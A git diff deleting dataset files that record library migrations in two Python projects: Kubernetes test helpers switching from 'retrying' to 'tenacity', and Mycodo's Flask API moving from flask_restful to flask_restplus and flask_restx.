namespace, label_selector=''): - try: - api_response = k8s_client.list_namespaced_pod(namespace=namespace, - label_selector=label_selector) - except ApiException as e: - print("Exception when calling CoreV1Api->list_pod_for_all_namespaces: %s\n" % e) - - return api_response - - -def resource_quota(api_instance, quota={}, namespace=TENANT_NAME): - name_object = client.V1ObjectMeta(name=namespace) - resource_quota_spec = client.V1ResourceQuotaSpec(hard=quota) - body = client.V1ResourceQuota(spec=resource_quota_spec, metadata=name_object) - api_instance.create_namespaced_resource_quota(namespace=namespace, body=body) - return quota - - -@pytest.fixture(scope="function") -def tenant(api_instance, minio_client, function_context): - name = TENANT_NAME - name_object = client.V1ObjectMeta(name=name) - namespace = client.V1Namespace(metadata=name_object) - api_instance.create_namespace(namespace) - propagate_portable_secrets(api_instance, name) - quota = resource_quota(api_instance, quota=TENANT_RESOURCES) - minio_client.create_bucket(Bucket=name) - function_context.add_object(object_type='tenant', object_to_delete={'name': name}) - return name, quota - - -@pytest.fixture(scope="session") -def fake_tenant(): - name = "andrzej" # USER1_HEADERS contain token for andrzej user with scope andrzej - quota = {} - return name, quota - - -@pytest.fixture(scope="function") -def empty_tenant(tenant): - return create_dummy_tenant(tenant) - - -@pytest.fixture(scope="function") -def fake_tenant_endpoint(fake_tenant): - return create_dummy_tenant(fake_tenant) - - -def create_dummy_tenant(tenant): - name, _ = tenant - body = {} - return name, body - - -@pytest.fixture(scope="function") -def fake_endpoint(tenant): - namespace, _ = tenant - model_name, model_version = 'fake', 1 - body = {'spec': {'modelName': model_name, - 'modelVersion': model_version}} - return namespace, body - - -def create_empty_model(endpoint, minio_client): - namespace, body = endpoint - model_name, model_version = body['spec']['modelName'], body['spec']['modelVersion'] - model_path = f'{model_name}-{model_version}/' - minio_client.put_object(Bucket=namespace, Body='', Key=model_path) - return namespace, body - - -@pytest.fixture(scope="function") -def endpoint_with_empty_model(tenant_with_endpoint, minio_client): - return create_empty_model(tenant_with_endpoint, minio_client) - - -@pytest.fixture(scope="function") -def fake_endpoint_with_empty_model(fake_endpoint, minio_client): - return create_empty_model(fake_endpoint, minio_client) diff --git a/v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$management_api_tests$context.py.diff b/v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$management_api_tests$context.py.diff deleted file mode 100644 index 7fe9d95..0000000 --- a/v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$management_api_tests$context.py.diff +++ /dev/null @@ -1,37 +0,0 @@ -diff --git a/tests/management_api_tests/context.py b/tests/management_api_tests/context.py - index 8c3944c099639b4871ece3273b9727f2427474e0..71aff3a0bd1ae2a7d7d91858dcbe721de152693e 100644 - --- a/tests/management_api_tests/context.py - +++ b/tests/management_api_tests/context.py -@@ -1,4 +1,4 @@ --from retrying import retry -+from tenacity import retry, stop_after_attempt, wait_fixed - import logging - from kubernetes import client - -@@ -67,7 +67,7 @@ class Context(object): - logging.info('Tenant {} deletion timeout.'.format(object_to_delete['name'])) - return OperationStatus.SUCCESS - -- @retry(stop_max_attempt_number=3, wait_fixed=2000) -+ @retry(stop=stop_after_attempt(3), wait=wait_fixed(2)) - def _delete_crd_server(self, object_to_delete): - delete_body = client.V1DeleteOptions() - try: -@@ -87,7 +87,7 @@ class Context(object): - logging.info('CRD {} deletion timeout.'.format(object_to_delete['name'])) - return response - -- @retry(stop_max_attempt_number=100, wait_fixed=2000) -+ @retry(stop=stop_after_attempt(100), wait=wait_fixed(2)) - def _wait_server_deletion(self, object_to_delete): - server_status = check_server_existence( - self.k8s_client_custom, object_to_delete['namespace'], object_to_delete['name']) -@@ -104,7 +104,7 @@ class Context(object): - return OperationStatus.SUCCESS - raise Exception - -- @retry(stop_max_attempt_number=100, wait_fixed=2000) -+ @retry(stop=stop_after_attempt(100), wait=wait_fixed(2)) - def _wait_tenant_deletion(self, name): - bucket_status = check_bucket_existence(self.minio_client, name) - namespace_status = check_namespace_availability(self.k8s_client_api, name) diff --git a/v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$management_api_tests$context.py.source.py b/v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$management_api_tests$context.py.source.py deleted file mode 100644 index 363d649..0000000 --- a/v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$management_api_tests$context.py.source.py +++ /dev/null @@ -1,120 +0,0 @@ -from retrying import retry -import logging -from kubernetes import client - -from management_api_tests.config import CRD_GROUP, CRD_VERSION, CRD_PLURAL, OperationStatus, \ - CheckResult -from management_api_tests.endpoints.endpoint_utils import check_server_existence, \ - check_server_pods_existence -from management_api_tests.tenants.tenant_utils import check_bucket_existence, \ - check_namespace_availability - - -class Context(object): - - def __init__(self, k8s_client, k8s_client_custom, minio_resource_client, minio_client): - self._objects = [] - self.k8s_client_api = k8s_client - self.k8s_client_custom = k8s_client_custom - self.minio_resource_client = minio_resource_client - self.minio_client = minio_client - - self.DELETE_FUNCTIONS = {'tenant': self._delete_namespace_bucket, - 'CRD': self._delete_crd_server} - - def delete_all_objects(self): - while len(self._objects) > 0: - item = self._objects.pop() - try: - logging.info("cleaning: {}".format(item['object'])) - item['function'](object_to_delete=item['object']) - except Exception as e: - logging.warning("Error while deleting {}: {}".format(item, e)) - - def add_object(self, object_type: str, object_to_delete: dict): - if object_type in self.DELETE_FUNCTIONS: - ready_object = {'function': self.DELETE_FUNCTIONS[object_type], - 'object': object_to_delete} - logging.info("adding: {}".format(object_to_delete)) - self._objects.append(ready_object) - else: - logging.info("We cannot match any delete function to this object: " - "{}".format(object_to_delete)) - - def _delete_namespace_bucket(self, object_to_delete): - name = object_to_delete['name'] - try: - bucket = self.minio_resource_client.Bucket(name) - bucket.objects.all().delete() - bucket.delete() - except Exception as e: - logging.error(e) - return OperationStatus.FAILURE - - body = client.V1DeleteOptions() - try: - self.k8s_client_api.delete_namespace(name, body) - except Exception as e: - logging.error(e) - return OperationStatus.FAILURE - - deletion_status = self._wait_tenant_deletion(object_to_delete['name']) - if deletion_status == OperationStatus.SUCCESS: - logging.info('Tenant {} deleted successfully.'.format(object_to_delete['name'])) - elif deletion_status == OperationStatus.TERMINATED: - logging.info('Tenant {} status unknown.'.format(object_to_delete['name'])) - else: - logging.info('Tenant {} deletion timeout.'.format(object_to_delete['name'])) - return OperationStatus.SUCCESS - - @retry(stop_max_attempt_number=3, wait_fixed=2000) - def _delete_crd_server(self, object_to_delete): - delete_body = client.V1DeleteOptions() - try: - response = self.k8s_client_custom.delete_namespaced_custom_object( - CRD_GROUP, CRD_VERSION, object_to_delete['namespace'], CRD_PLURAL, - object_to_delete['name'], delete_body, grace_period_seconds=0) - except Exception as e: - logging.error(e) - raise - - deletion_status = self._wait_server_deletion(object_to_delete) - if deletion_status == OperationStatus.SUCCESS: - logging.info('CRD {} deleted successfully.'.format(object_to_delete['name'])) - elif deletion_status == OperationStatus.TERMINATED: - logging.info('CRD {} status unknown.'.format(object_to_delete['name'])) - else: - logging.info('CRD {} deletion timeout.'.format(object_to_delete['name'])) - return response - - @retry(stop_max_attempt_number=100, wait_fixed=2000) - def _wait_server_deletion(self, object_to_delete): - server_status = check_server_existence( - self.k8s_client_custom, object_to_delete['namespace'], object_to_delete['name']) - server_pods_status = check_server_pods_existence( - self.k8s_client_api, object_to_delete['namespace'], object_to_delete['name'], 1) - completed = (server_status == CheckResult.RESOURCE_DOES_NOT_EXIST and - server_pods_status == CheckResult.RESOURCE_DOES_NOT_EXIST) - - if server_status == CheckResult.ERROR or server_pods_status == CheckResult.ERROR: - logging.error("Error occurred during server status check") - return OperationStatus.TERMINATED - - if completed: - return OperationStatus.SUCCESS - raise Exception - - @retry(stop_max_attempt_number=100, wait_fixed=2000) - def _wait_tenant_deletion(self, name): - bucket_status = check_bucket_existence(self.minio_client, name) - namespace_status = check_namespace_availability(self.k8s_client_api, name) - completed = (bucket_status == CheckResult.RESOURCE_DOES_NOT_EXIST and - namespace_status == CheckResult.RESOURCE_DOES_NOT_EXIST) - - if bucket_status == CheckResult.ERROR or namespace_status == CheckResult.ERROR: - logging.error("Error occurred during bucket or namespace status check") - return OperationStatus.TERMINATED - - if completed: - return OperationStatus.SUCCESS - raise Exception diff --git a/v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$management_api_tests$context.py.target.py b/v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$management_api_tests$context.py.target.py deleted file mode 100644 index 5906e60..0000000 --- a/v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$management_api_tests$context.py.target.py +++ /dev/null @@ -1,120 +0,0 @@ -from tenacity import retry, stop_after_attempt, wait_fixed -import logging -from kubernetes import client - -from management_api_tests.config import CRD_GROUP, CRD_VERSION, CRD_PLURAL, OperationStatus, \ - CheckResult -from management_api_tests.endpoints.endpoint_utils import check_server_existence, \ - check_server_pods_existence -from management_api_tests.tenants.tenant_utils import check_bucket_existence, \ - check_namespace_availability - - -class Context(object): - - def __init__(self, k8s_client, k8s_client_custom, minio_resource_client, minio_client): - self._objects = [] - self.k8s_client_api = k8s_client - self.k8s_client_custom = k8s_client_custom - self.minio_resource_client = minio_resource_client - self.minio_client = minio_client - - self.DELETE_FUNCTIONS = {'tenant': self._delete_namespace_bucket, - 'CRD': self._delete_crd_server} - - def delete_all_objects(self): - while len(self._objects) > 0: - item = self._objects.pop() - try: - logging.info("cleaning: {}".format(item['object'])) - item['function'](object_to_delete=item['object']) - except Exception as e: - logging.warning("Error while deleting {}: {}".format(item, e)) - - def add_object(self, object_type: str, object_to_delete: dict): - if object_type in self.DELETE_FUNCTIONS: - ready_object = {'function': self.DELETE_FUNCTIONS[object_type], - 'object': object_to_delete} - logging.info("adding: {}".format(object_to_delete)) - self._objects.append(ready_object) - else: - logging.info("We cannot match any delete function to this object: " - "{}".format(object_to_delete)) - - def _delete_namespace_bucket(self, object_to_delete): - name = object_to_delete['name'] - try: - bucket = self.minio_resource_client.Bucket(name) - bucket.objects.all().delete() - bucket.delete() - except Exception as e: - logging.error(e) - return OperationStatus.FAILURE - - body = client.V1DeleteOptions() - try: - self.k8s_client_api.delete_namespace(name, body) - except Exception as e: - logging.error(e) - return OperationStatus.FAILURE - - deletion_status = self._wait_tenant_deletion(object_to_delete['name']) - if deletion_status == OperationStatus.SUCCESS: - logging.info('Tenant {} deleted successfully.'.format(object_to_delete['name'])) - elif deletion_status == OperationStatus.TERMINATED: - logging.info('Tenant {} status unknown.'.format(object_to_delete['name'])) - else: - logging.info('Tenant {} deletion timeout.'.format(object_to_delete['name'])) - return OperationStatus.SUCCESS - - @retry(stop=stop_after_attempt(3), wait=wait_fixed(2)) - def _delete_crd_server(self, object_to_delete): - delete_body = client.V1DeleteOptions() - try: - response = self.k8s_client_custom.delete_namespaced_custom_object( - CRD_GROUP, CRD_VERSION, object_to_delete['namespace'], CRD_PLURAL, - object_to_delete['name'], delete_body, grace_period_seconds=0) - except Exception as e: - logging.error(e) - raise - - deletion_status = self._wait_server_deletion(object_to_delete) - if deletion_status == OperationStatus.SUCCESS: - logging.info('CRD {} deleted successfully.'.format(object_to_delete['name'])) - elif deletion_status == OperationStatus.TERMINATED: - logging.info('CRD {} status unknown.'.format(object_to_delete['name'])) - else: - logging.info('CRD {} deletion timeout.'.format(object_to_delete['name'])) - return response - - @retry(stop=stop_after_attempt(100), wait=wait_fixed(2)) - def _wait_server_deletion(self, object_to_delete): - server_status = check_server_existence( - self.k8s_client_custom, object_to_delete['namespace'], object_to_delete['name']) - server_pods_status = check_server_pods_existence( - self.k8s_client_api, object_to_delete['namespace'], object_to_delete['name'], 1) - completed = (server_status == CheckResult.RESOURCE_DOES_NOT_EXIST and - server_pods_status == CheckResult.RESOURCE_DOES_NOT_EXIST) - - if server_status == CheckResult.ERROR or server_pods_status == CheckResult.ERROR: - logging.error("Error occurred during server status check") - return OperationStatus.TERMINATED - - if completed: - return OperationStatus.SUCCESS - raise Exception - - @retry(stop=stop_after_attempt(100), wait=wait_fixed(2)) - def _wait_tenant_deletion(self, name): - bucket_status = check_bucket_existence(self.minio_client, name) - namespace_status = check_namespace_availability(self.k8s_client_api, name) - completed = (bucket_status == CheckResult.RESOURCE_DOES_NOT_EXIST and - namespace_status == CheckResult.RESOURCE_DOES_NOT_EXIST) - - if bucket_status == CheckResult.ERROR or namespace_status == CheckResult.ERROR: - logging.error("Error occurred during bucket or namespace status check") - return OperationStatus.TERMINATED - - if completed: - return OperationStatus.SUCCESS - raise Exception diff --git a/v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$management_api_tests$endpoints$endpoint_utils.py.diff b/v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$management_api_tests$endpoints$endpoint_utils.py.diff deleted file mode 100644 index 3f4e6cc..0000000 --- a/v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$management_api_tests$endpoints$endpoint_utils.py.diff +++ /dev/null @@ -1,21 +0,0 @@ -diff --git a/tests/management_api_tests/endpoints/endpoint_utils.py b/tests/management_api_tests/endpoints/endpoint_utils.py - index 8c3944c099639b4871ece3273b9727f2427474e0..71aff3a0bd1ae2a7d7d91858dcbe721de152693e 100644 - --- a/tests/management_api_tests/endpoints/endpoint_utils.py - +++ b/tests/management_api_tests/endpoints/endpoint_utils.py -@@ -1,6 +1,6 @@ - from time import sleep - --from retrying import retry -+from tenacity import retry, stop_after_attempt - - from management_api_tests.config import CRD_GROUP, CRD_PLURAL, CRD_VERSION, CheckResult, \ - RESOURCE_NOT_FOUND, OperationStatus -@@ -105,7 +105,7 @@ def check_server_update_result(api_instance, namespace, endpoint_name, new_value - return CheckResult.CONTENTS_MATCHING - - --@retry(stop_max_attempt_number=50) -+@retry(stop=stop_after_attempt(50)) - def wait_server_setup(api_instance, namespace, endpoint_name, replicas): - sleep(2) - try: diff --git a/v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$management_api_tests$endpoints$endpoint_utils.py.source.py b/v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$management_api_tests$endpoints$endpoint_utils.py.source.py deleted file mode 100644 index 2eed92f..0000000 --- a/v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$management_api_tests$endpoints$endpoint_utils.py.source.py +++ /dev/null @@ -1,122 +0,0 @@ -from time import sleep - -from retrying import retry - -from management_api_tests.config import CRD_GROUP, CRD_PLURAL, CRD_VERSION, CheckResult, \ - RESOURCE_NOT_FOUND, OperationStatus -from kubernetes.client.rest import ApiException -import logging - -from management_api_tests.reused import transform_quota - - -def check_replicas_number_matching_provided(custom_obj_api_instance, namespace, endpoint_name, - provided_number): - try: - endpoint_object = custom_obj_api_instance. \ - get_namespaced_custom_object(CRD_GROUP, CRD_VERSION, namespace, CRD_PLURAL, - endpoint_name) - except ApiException as apiException: - if apiException.status == RESOURCE_NOT_FOUND: - return CheckResult.RESOURCE_DOES_NOT_EXIST - return CheckResult.ERROR - - except Exception as e: - logging.error('Unexpected error occurred during reading endpoint object: {}'.format(e)) - return CheckResult.ERROR - - if endpoint_object['spec']['replicas'] == provided_number: - return CheckResult.CONTENTS_MATCHING - return CheckResult.CONTENTS_MISMATCHING - - -def check_model_params_matching_provided(custom_obj_api_instance, namespace, endpoint_name, - provided_params): - try: - endpoint_object = custom_obj_api_instance. \ - get_namespaced_custom_object(CRD_GROUP, CRD_VERSION, namespace, CRD_PLURAL, - endpoint_name) - except ApiException as apiException: - if apiException.status == RESOURCE_NOT_FOUND: - return CheckResult.RESOURCE_DOES_NOT_EXIST - return CheckResult.ERROR - - except Exception as e: - logging.error('Unexpected error occurred during reading endpoint object: {}'.format(e)) - return CheckResult.ERROR - - if 'resources' in provided_params: - provided_params['resources'] = transform_quota(provided_params['resources']) - - for k, v in provided_params.items(): - if k not in endpoint_object['spec'] or provided_params[k] != endpoint_object['spec'][k]: - return CheckResult.CONTENTS_MISMATCHING - return CheckResult.CONTENTS_MATCHING - - -def check_server_existence(custom_obj_api_instance, namespace, endpoint_name): - try: - custom_obj_api_instance. \ - get_namespaced_custom_object(CRD_GROUP, CRD_VERSION, namespace, - CRD_PLURAL, endpoint_name) - except ApiException as apiException: - if apiException.status == RESOURCE_NOT_FOUND: - return CheckResult.RESOURCE_DOES_NOT_EXIST - return CheckResult.ERROR - - return CheckResult.RESOURCE_AVAILABLE - - -def check_server_pods_existence(api_instance, namespace, endpoint_name, replicas): - label_selector = 'endpoint={}'.format(endpoint_name) - try: - pods = api_instance.list_namespaced_pod(namespace=namespace, - label_selector=label_selector) - except ApiException as apiException: - if apiException.status == RESOURCE_NOT_FOUND: - return CheckResult.RESOURCE_DOES_NOT_EXIST - return CheckResult.ERROR - if len(pods.items) != replicas: - return CheckResult.RESOURCE_DOES_NOT_EXIST - return CheckResult.RESOURCE_AVAILABLE - - -def check_server_update_result(api_instance, namespace, endpoint_name, new_values): - try: - api_response = api_instance.read_namespaced_deployment_status(endpoint_name, - namespace, - pretty="pretty") - except ApiException as apiException: - return CheckResult.ERROR - - container = api_response.spec.template.spec.containers.pop() - arg = container.args.pop() - quota = container.resources.limits - quota.update(container.resources.requests) - model_path = f'{namespace}/{new_values["modelName"]}-{new_values["modelVersion"]}' - if 'resources' in new_values: - new_values['resources'] = transform_quota(new_values['resources']) - for key, value in new_values['resources']: - if new_values[key] != quota[key]: - return CheckResult.CONTENTS_MISMATCHING - if ('--model_name=' + new_values['modelName']) not in arg or ( - '--model_base_path=s3://' + model_path) not in arg: - return CheckResult.CONTENTS_MISMATCHING - return CheckResult.CONTENTS_MATCHING - - -@retry(stop_max_attempt_number=50) -def wait_server_setup(api_instance, namespace, endpoint_name, replicas): - sleep(2) - try: - api_response = api_instance.read_namespaced_deployment_status(endpoint_name, - namespace, - pretty="pretty") - except ApiException as apiException: - return OperationStatus.TERMINATED - - if api_response.status.updated_replicas != replicas: - return OperationStatus.FAILURE - if api_response.status.ready_replicas != api_response.status.updated_replicas: - raise Exception - return OperationStatus.SUCCESS diff --git a/v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$management_api_tests$endpoints$endpoint_utils.py.target.py b/v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$management_api_tests$endpoints$endpoint_utils.py.target.py deleted file mode 100644 index 324b30c..0000000 --- a/v1/data/codefile/intelai@inference-model-manager__71aff3a__tests$management_api_tests$endpoints$endpoint_utils.py.target.py +++ /dev/null @@ -1,122 +0,0 @@ -from time import sleep - -from tenacity import retry, stop_after_attempt - -from management_api_tests.config import CRD_GROUP, CRD_PLURAL, CRD_VERSION, CheckResult, \ - RESOURCE_NOT_FOUND, OperationStatus -from kubernetes.client.rest import ApiException -import logging - -from management_api_tests.reused import transform_quota - - -def check_replicas_number_matching_provided(custom_obj_api_instance, namespace, endpoint_name, - provided_number): - try: - endpoint_object = custom_obj_api_instance. \ - get_namespaced_custom_object(CRD_GROUP, CRD_VERSION, namespace, CRD_PLURAL, - endpoint_name) - except ApiException as apiException: - if apiException.status == RESOURCE_NOT_FOUND: - return CheckResult.RESOURCE_DOES_NOT_EXIST - return CheckResult.ERROR - - except Exception as e: - logging.error('Unexpected error occurred during reading endpoint object: {}'.format(e)) - return CheckResult.ERROR - - if endpoint_object['spec']['replicas'] == provided_number: - return CheckResult.CONTENTS_MATCHING - return CheckResult.CONTENTS_MISMATCHING - - -def check_model_params_matching_provided(custom_obj_api_instance, namespace, endpoint_name, - provided_params): - try: - endpoint_object = custom_obj_api_instance. \ - get_namespaced_custom_object(CRD_GROUP, CRD_VERSION, namespace, CRD_PLURAL, - endpoint_name) - except ApiException as apiException: - if apiException.status == RESOURCE_NOT_FOUND: - return CheckResult.RESOURCE_DOES_NOT_EXIST - return CheckResult.ERROR - - except Exception as e: - logging.error('Unexpected error occurred during reading endpoint object: {}'.format(e)) - return CheckResult.ERROR - - if 'resources' in provided_params: - provided_params['resources'] = transform_quota(provided_params['resources']) - - for k, v in provided_params.items(): - if k not in endpoint_object['spec'] or provided_params[k] != endpoint_object['spec'][k]: - return CheckResult.CONTENTS_MISMATCHING - return CheckResult.CONTENTS_MATCHING - - -def check_server_existence(custom_obj_api_instance, namespace, endpoint_name): - try: - custom_obj_api_instance. \ - get_namespaced_custom_object(CRD_GROUP, CRD_VERSION, namespace, - CRD_PLURAL, endpoint_name) - except ApiException as apiException: - if apiException.status == RESOURCE_NOT_FOUND: - return CheckResult.RESOURCE_DOES_NOT_EXIST - return CheckResult.ERROR - - return CheckResult.RESOURCE_AVAILABLE - - -def check_server_pods_existence(api_instance, namespace, endpoint_name, replicas): - label_selector = 'endpoint={}'.format(endpoint_name) - try: - pods = api_instance.list_namespaced_pod(namespace=namespace, - label_selector=label_selector) - except ApiException as apiException: - if apiException.status == RESOURCE_NOT_FOUND: - return CheckResult.RESOURCE_DOES_NOT_EXIST - return CheckResult.ERROR - if len(pods.items) != replicas: - return CheckResult.RESOURCE_DOES_NOT_EXIST - return CheckResult.RESOURCE_AVAILABLE - - -def check_server_update_result(api_instance, namespace, endpoint_name, new_values): - try: - api_response = api_instance.read_namespaced_deployment_status(endpoint_name, - namespace, - pretty="pretty") - except ApiException as apiException: - return CheckResult.ERROR - - container = api_response.spec.template.spec.containers.pop() - arg = container.args.pop() - quota = container.resources.limits - quota.update(container.resources.requests) - model_path = f'{namespace}/{new_values["modelName"]}-{new_values["modelVersion"]}' - if 'resources' in new_values: - new_values['resources'] = transform_quota(new_values['resources']) - for key, value in new_values['resources']: - if new_values[key] != quota[key]: - return CheckResult.CONTENTS_MISMATCHING - if ('--model_name=' + new_values['modelName']) not in arg or ( - '--model_base_path=s3://' + model_path) not in arg: - return CheckResult.CONTENTS_MISMATCHING - return CheckResult.CONTENTS_MATCHING - - -@retry(stop=stop_after_attempt(50)) -def wait_server_setup(api_instance, namespace, endpoint_name, replicas): - sleep(2) - try: - api_response = api_instance.read_namespaced_deployment_status(endpoint_name, - namespace, - pretty="pretty") - except ApiException as apiException: - return OperationStatus.TERMINATED - - if api_response.status.updated_replicas != replicas: - return OperationStatus.FAILURE - if api_response.status.ready_replicas != api_response.status.updated_replicas: - raise Exception - return OperationStatus.SUCCESS diff --git a/v1/data/codefile/kizniche@mycodo__047263b__mycodo$mycodo_flask$api.py.diff b/v1/data/codefile/kizniche@mycodo__047263b__mycodo$mycodo_flask$api.py.diff deleted file mode 100644 index 9bcb4d6..0000000 --- a/v1/data/codefile/kizniche@mycodo__047263b__mycodo$mycodo_flask$api.py.diff +++ /dev/null @@ -1,60 +0,0 @@ -diff --git a/mycodo/mycodo_flask/api.py b/mycodo/mycodo_flask/api.py - index f16c7239c2ced3605d1506d0236729fc23c9df10..047263beb9e4301c30eef0f44d8d93c722b31f20 100644 - --- a/mycodo/mycodo_flask/api.py - +++ b/mycodo/mycodo_flask/api.py -@@ -2,7 +2,9 @@ - import logging - - import flask_login --from flask_restful import Resource -+from flask import Blueprint -+from flask_restplus import Api -+from flask_restplus import Resource - - from mycodo.databases.models import Input - from mycodo.databases.models import User -@@ -12,28 +14,33 @@ from mycodo.mycodo_flask.utils import utils_general - - logger = logging.getLogger(__name__) - -+api_bp = Blueprint('api', __name__, url_prefix='/api') - --class Inputs(Resource): -+api = Api(api_bp, version='1.0', title='Mycodo API', -+ description='An API for Mycodo') -+ -+ -+@api.route('/inputs') -+class Users(Resource): -+ """Interacts with Input settings in the SQL database""" -+ @api.doc('dump_users') - @flask_login.login_required - def get(self): -+ """Dumps all Input settings""" - if not utils_general.user_has_permission('view_settings'): - return 'You do not have permission to access this.', 401 -- inputs_list = [] - input_schema = InputSchema() -- all_inputs = Input.query.all() -- for each_input in all_inputs: -- inputs_list.append(input_schema.dump(each_input)) -- return inputs_list -+ return input_schema.dump(Input.query.all(), many=True) - - -+@api.route('/users') - class Users(Resource): -+ """Interacts with User settings in the SQL database""" -+ @api.doc('dump_users') - @flask_login.login_required - def get(self): -+ """Dumps all User settings""" - if not utils_general.user_has_permission('view_settings'): - return 'You do not have permission to access this.', 401 -- users_list = [] - user_schema = UserSchema() -- all_users = User.query.all() -- for each_user in all_users: -- users_list.append(user_schema.dump(each_user)) -- return users_list -+ return user_schema.dump(User.query.all(), many=True) diff --git a/v1/data/codefile/kizniche@mycodo__047263b__mycodo$mycodo_flask$api.py.source.py b/v1/data/codefile/kizniche@mycodo__047263b__mycodo$mycodo_flask$api.py.source.py deleted file mode 100644 index 9995643..0000000 --- a/v1/data/codefile/kizniche@mycodo__047263b__mycodo$mycodo_flask$api.py.source.py +++ /dev/null @@ -1,39 +0,0 @@ -# coding=utf-8 -import logging - -import flask_login -from flask_restful import Resource - -from mycodo.databases.models import Input -from mycodo.databases.models import User -from mycodo.databases.models.input import InputSchema -from mycodo.databases.models.user import UserSchema -from mycodo.mycodo_flask.utils import utils_general - -logger = logging.getLogger(__name__) - - -class Inputs(Resource): - @flask_login.login_required - def get(self): - if not utils_general.user_has_permission('view_settings'): - return 'You do not have permission to access this.', 401 - inputs_list = [] - input_schema = InputSchema() - all_inputs = Input.query.all() - for each_input in all_inputs: - inputs_list.append(input_schema.dump(each_input)) - return inputs_list - - -class Users(Resource): - @flask_login.login_required - def get(self): - if not utils_general.user_has_permission('view_settings'): - return 'You do not have permission to access this.', 401 - users_list = [] - user_schema = UserSchema() - all_users = User.query.all() - for each_user in all_users: - users_list.append(user_schema.dump(each_user)) - return users_list diff --git a/v1/data/codefile/kizniche@mycodo__047263b__mycodo$mycodo_flask$api.py.target.py b/v1/data/codefile/kizniche@mycodo__047263b__mycodo$mycodo_flask$api.py.target.py deleted file mode 100644 index b5ffeb6..0000000 --- a/v1/data/codefile/kizniche@mycodo__047263b__mycodo$mycodo_flask$api.py.target.py +++ /dev/null @@ -1,46 +0,0 @@ -# coding=utf-8 -import logging - -import flask_login -from flask import Blueprint -from flask_restplus import Api -from flask_restplus import Resource - -from mycodo.databases.models import Input -from mycodo.databases.models import User -from mycodo.databases.models.input import InputSchema -from mycodo.databases.models.user import UserSchema -from mycodo.mycodo_flask.utils import utils_general - -logger = logging.getLogger(__name__) - -api_bp = Blueprint('api', __name__, url_prefix='/api') - -api = Api(api_bp, version='1.0', title='Mycodo API', - description='An API for Mycodo') - - -@api.route('/inputs') -class Users(Resource): - """Interacts with Input settings in the SQL database""" - @api.doc('dump_users') - @flask_login.login_required - def get(self): - """Dumps all Input settings""" - if not utils_general.user_has_permission('view_settings'): - return 'You do not have permission to access this.', 401 - input_schema = InputSchema() - return input_schema.dump(Input.query.all(), many=True) - - -@api.route('/users') -class Users(Resource): - """Interacts with User settings in the SQL database""" - @api.doc('dump_users') - @flask_login.login_required - def get(self): - """Dumps all User settings""" - if not utils_general.user_has_permission('view_settings'): - return 'You do not have permission to access this.', 401 - user_schema = UserSchema() - return user_schema.dump(User.query.all(), many=True) diff --git a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$__init__.py.diff b/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$__init__.py.diff deleted file mode 100644 index 374c217..0000000 --- a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$__init__.py.diff +++ /dev/null @@ -1,13 +0,0 @@ -diff --git a/mycodo/mycodo_flask/api/__init__.py b/mycodo/mycodo_flask/api/__init__.py - index 7e208d0c5c86d0d627c541ea4ec68e95e2b84870..516917351d7d8341375db4481ac72910c9510a42 100644 - --- a/mycodo/mycodo_flask/api/__init__.py - +++ b/mycodo/mycodo_flask/api/__init__.py -@@ -3,7 +3,7 @@ import logging - - from flask import Blueprint - from flask import make_response --from flask_restplus import Api -+from flask_restx import Api - - logger = logging.getLogger(__name__) - diff --git a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$__init__.py.source.py b/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$__init__.py.source.py deleted file mode 100644 index 36e9078..0000000 --- a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$__init__.py.source.py +++ /dev/null @@ -1,71 +0,0 @@ -# coding=utf-8 -import logging - -from flask import Blueprint -from flask import make_response -from flask_restplus import Api - -logger = logging.getLogger(__name__) - -api_blueprint = Blueprint('api', __name__, url_prefix='/api') - -authorizations = { - 'apikey': { - 'type': 'apiKey', - 'in': 'header', - 'name': 'X-API-KEY' - } -} - -default_responses = { - 200: 'Success', - 401: 'Invalid API Key', - 403: 'Insufficient Permissions', - 404: 'Not Found', - 422: 'Unprocessable Entity', - 429: 'Too Many Requests', - 500: 'Internal Server Error' -} - -api = Api( - api_blueprint, - version='1.0', - title='Mycodo API', - description='A REST API for Mycodo', - authorizations=authorizations, - default_mediatype='application/vnd.mycodo.v1+json' -) - -# Remove default accept header content type -if 'application/json' in api.representations: - del api.representations['application/json'] - -# Add API v1 + json accept content type -@api.representation('application/vnd.mycodo.v1+json') -def api_v1(data, code, headers): - if data is None: - data = {} - resp = make_response(data, code) - resp.headers.extend(headers) - return resp - -# To be used when v2 of the API is released -# @api.representation('application/vnd.mycodo.v2+json') -# def api_v2(data, code, headers): -# resp = make_response(data, code) -# resp.headers.extend(headers) -# return resp - - -def init_api(app): - import mycodo.mycodo_flask.api.choices - import mycodo.mycodo_flask.api.controller - import mycodo.mycodo_flask.api.daemon - import mycodo.mycodo_flask.api.input - import mycodo.mycodo_flask.api.math - import mycodo.mycodo_flask.api.measurement - import mycodo.mycodo_flask.api.output - import mycodo.mycodo_flask.api.pid - import mycodo.mycodo_flask.api.settings - - app.register_blueprint(api_blueprint) diff --git a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$__init__.py.target.py b/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$__init__.py.target.py deleted file mode 100644 index 53e63b7..0000000 --- a/v1/data/codefile/kizniche@mycodo__5169173__mycodo$mycodo_flask$api$__init__.py.target.py +++ /dev/null @@ -1,71 +0,0 @@ -# 